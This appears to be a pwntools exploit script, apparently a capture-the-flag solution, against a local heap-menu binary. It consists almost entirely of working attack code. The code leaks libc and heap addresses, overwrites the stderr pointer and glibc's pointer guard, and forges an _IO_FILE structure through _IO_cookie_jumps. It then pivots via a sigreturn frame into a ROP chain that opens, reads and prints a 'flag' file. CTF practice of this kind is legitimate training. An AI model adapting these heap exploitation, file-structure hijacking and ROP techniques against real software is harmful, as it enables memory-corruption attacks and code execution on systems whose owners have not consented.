| 12
 3
 4
 5
 6
 7
 8
 9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
 100
 101
 102
 103
 104
 105
 106
 107
 108
 109
 110
 111
 112
 113
 114
 115
 116
 117
 118
 119
 120
 121
 122
 123
 124
 125
 126
 127
 128
 129
 130
 131
 132
 133
 134
 135
 136
 137
 138
 139
 140
 141
 142
 143
 144
 145
 146
 147
 148
 149
 150
 151
 152
 153
 154
 155
 
 | from pwn import *
 elf = ELF('./pwn')
 libc = ELF('./libc.so.6')
 r = process('./pwn')
 
 context.log_level = 'debug'
 context.terminal = ['tmux', 'splitw', '-h']
 context.arch = 'amd64'
 payload = b''
 
 
 def create(idx, size):
 global payload
 payload += p8(0x1)
 payload += p8(idx)
 payload += p16(size)
 
 
 def delete(idx):
 global payload
 payload += p8(0x2)
 payload += p8(idx)
 
 
 def show(idx):
 global payload
 payload += p8(0x3)
 payload += p8(idx)
 
 
 def edit(idx, content):
 global payload
 payload += p8(0x4)
 payload += p8(idx)
 print(len(content))
 payload += p16(len(content))
 payload += content
 
 
 def run():
 global payload
 payload += p8(0x5)
 if len(payload) > 0x500:
 error('!!!')
 r.recvuntil(b'Pls input the opcode')
 r.send(payload)
 payload = b''
 
 
 create(0, 0x410)
 create(1, 0x410)
 create(2, 0x420)
 create(3, 0x430)
 delete(2)
 run()
 show(2)
 run()
 r.recvline()
 libc_base = u64(r.recv(6).ljust(8, b'\x00')) - 0x1f30b0
 print(hex(libc_base))
 
 gadget_addr = libc_base + 0x146020
 pointer_chk_guard_local = libc_base + 0x234c10 + 0x2000
 setcontext_addr = libc_base + 0x50bfd
 pop_rdi = libc_base + next(libc.search(asm('pop rdi\nret')))
 pop_rsi = libc_base + next(libc.search(asm('pop rsi\nret')))
 pop_rax = libc_base + next(libc.search(asm('pop rax\nret')))
 syscall = libc_base + next(libc.search(asm('syscall\nret')))
 
 edit(2, b'a' * 0x10)
 show(2)
 run()
 r.recvuntil(b'a' * 0x10)
 heap_base = u64(r.recv(6).ljust(8, b'\x00')) - 0x2ae0
 print(hex(heap_base))
 
 delete(0)
 edit(
 2,
 flat(libc_base + 0x1f30b0, libc_base + 0x1f30b0, heap_base + 0x2ae0,
 libc_base + libc.symbols['stderr'] - 0x20))
 create(5, 0x430)
 create(0, 0x410)
 run()
 
 delete(0)
 edit(
 2,
 flat(libc_base + 0x1f30b0, libc_base + 0x1f30b0, heap_base + 0x2ae0,
 pointer_chk_guard_local))
 create(6, 0x430)
 run()
 
 
 def ROL(content, key):
 tmp = bin(content)[2:].rjust(64, '0')
 return int(tmp[key:] + tmp[:key], 2)
 
 
 create(7, 0x450)
 delete(7)
 create(8, 0x430)
 run()
 edit(7, b'a' * 0x430 + flat(0, 0x300))
 run()
 
 next_chain = 0
 srop_addr = heap_base + 0x2ae0 + 0x10
 fake_IO_FILE = 2 * p64(0)
 fake_IO_FILE += p64(0)
 fake_IO_FILE += p64(0xffffffffffffffff)
 fake_IO_FILE += p64(0)
 fake_IO_FILE += p64(0)
 fake_IO_FILE += p64(0)
 fake_IO_FILE = fake_IO_FILE.ljust(0x58, b'\x00')
 fake_IO_FILE += p64(next_chain)
 fake_IO_FILE = fake_IO_FILE.ljust(0x78, b'\x00')
 fake_IO_FILE += p64(heap_base)
 fake_IO_FILE = fake_IO_FILE.ljust(0xB0, b'\x00')
 fake_IO_FILE += p64(0)
 fake_IO_FILE = fake_IO_FILE.ljust(0xC8, b'\x00')
 fake_IO_FILE += p64(libc.sym['_IO_cookie_jumps'] + 0x40)
 fake_IO_FILE += p64(srop_addr)
 fake_IO_FILE += p64(0)
 fake_IO_FILE += p64(ROL(gadget_addr ^ (heap_base + 0x22a0), 0x11))
 
 fake_frame_addr = srop_addr
 frame = SigreturnFrame()
 frame.rdi = fake_frame_addr + 0xF8
 frame.rsi = 0
 frame.rdx = 0x100
 frame.rsp = fake_frame_addr + 0xF8 + 0x10
 frame.rip = pop_rdi + 1
 
 rop_data = [
 pop_rax, 2, syscall, pop_rax, 0, pop_rdi, 3, pop_rsi,
 fake_frame_addr + 0x200, syscall, pop_rax, 1, pop_rdi, 1, pop_rsi,
 fake_frame_addr + 0x200, syscall
 ]
 pay = p64(0) + p64(fake_frame_addr) + b'\x00' * 0x10 + p64(setcontext_addr +
 61)
 pay += bytes(frame).ljust(0xF8, b'\x00')[0x28:] + b'flag'.ljust(
 0x10, b'\x00') + flat(rop_data)
 
 edit(0, pay)
 edit(2, fake_IO_FILE)
 run()
 
 create(9, 0x450)
 run()
 
 gdb.attach(r)
 
 r.interactive()
 
 |